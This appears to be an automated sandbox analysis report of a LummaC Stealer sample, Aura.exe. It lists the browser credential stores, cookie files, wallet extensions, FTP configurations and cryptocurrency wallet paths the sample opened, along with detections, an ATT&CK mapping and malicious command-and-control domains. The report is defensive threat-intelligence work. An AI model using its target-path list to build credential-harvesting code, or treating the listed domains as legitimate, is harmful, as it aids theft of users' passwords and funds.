Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents			Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	Directory queried: C:\Users\user\Documents			Jump to behavior

Source: Yara match	File source: 00000004.00000003.1340998626.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1344718805.00000000012B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1282396896.00000000012B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1344787476.0000000001267000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1345469435.0000000001267000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Aura.exe PID: 7880, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Aura.exe PID: 7880, type: MEMORYSTR
Source: Yara match	File source: 4.2.Aura.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Aura.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2438218367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1257698483.00000000022E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	22 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	251 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	22 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Software Packing	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	12 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	33 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Aura.exe	51%	Virustotal		Browse
Aura.exe	47%	ReversingLabs	Win32.Trojan.Lummac

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
mrodularmall.top/aNzS	100%	Avira URL Cloud	malware
https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=1d8e991a19232cb569_101849607591	0%	Avira URL Cloud	safe
https://featureccus.shop/bdMAn	100%	Avira URL Cloud	malware
bugildbett.top/bAuz	100%	Avira URL Cloud	malware
https://menuedgarli.shopA	0%	Avira URL Cloud	safe
legenassedk.top/bdpWO	100%	Avira URL Cloud	malware
https://menuedgarli.shop/AUIqn	100%	Avira URL Cloud	malware
menuedgarli.shop/AUIqn	100%	Avira URL Cloud	malware
https://menuedgarli.shop/au	100%	Avira URL Cloud	malware
jowinjoinery.icu/bdWUa	100%	Avira URL Cloud	malware
featureccus.shop/bdMAn	100%	Avira URL Cloud	malware
htardwarehu.icu/Sbdsa	100%	Avira URL Cloud	malware
https://menuedgarli.shop/	100%	Avira URL Cloud	malware
https://mrodularmall.top/	100%	Avira URL Cloud	malware
cjlaspcorne.icu/DbIps	100%	Avira URL Cloud	malware
https://mrodularmall.top/aNzS	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
t.me	149.154.167.99	true	false	high
menuedgarli.shop	104.21.16.1	true	true	unknown
mrodularmall.top	104.21.48.1	true	false	high
featureccus.shop	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
mrodularmall.top/aNzS	true	Avira URL Cloud: malware	unknown
bugildbett.top/bAuz	true	Avira URL Cloud: malware	unknown
menuedgarli.shop/AUIqn	true	Avira URL Cloud: malware	unknown
jowinjoinery.icu/bdWUa	true	Avira URL Cloud: malware	unknown
legenassedk.top/bdpWO	true	Avira URL Cloud: malware	unknown
https://menuedgarli.shop/AUIqn	false	Avira URL Cloud: malware	unknown
featureccus.shop/bdMAn	true	Avira URL Cloud: malware	unknown
https://mrodularmall.top/aNzS	false	Avira URL Cloud: malware	unknown
htardwarehu.icu/Sbdsa	true	Avira URL Cloud: malware	unknown
https://t.me/asdawfq	false		high
cjlaspcorne.icu/DbIps	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://t.me/	Aura.exe, 00000004.00000003.1210324639.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1210182330.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1210253320.0000000001242000.00000004.00000020.00020000.00000000.sdmp	false		high
https://menuedgarli.shop/au	Aura.exe, 00000004.00000003.1282396896.00000000012D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=1d8e991a19232cb569_101849607591	Aura.exe, 00000004.00000003.1210324639.0000000001267000.00000004.00000020.00020000.00000000.sdmp, Aura.exe, 00000004.00000003.1210182330.0000000001267000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Aura.exe, 00000004.00000003.1256193017.0000000003918000.00000004.00000800.00020000.00000000.sdmp	false		high
